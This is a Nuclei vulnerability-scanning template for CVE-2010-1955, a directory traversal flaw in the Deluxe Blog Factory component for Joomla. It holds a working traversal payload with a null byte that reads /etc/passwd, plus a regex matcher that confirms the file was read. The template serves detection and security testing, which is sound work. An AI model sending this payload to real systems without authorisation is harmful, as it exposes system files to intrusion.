my-nuclei-templates/CVE-2010-1955.yaml

31 lines
1.0 KiB
YAML

id: CVE-2010-1955
info:
name: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12238
- https://www.cvedetails.com/cve/CVE-2010-1955
- http://web.archive.org/web/20210121195552/https://www.securityfocus.com/bid/39508/
- http://secunia.com/advisories/39473
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1955
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15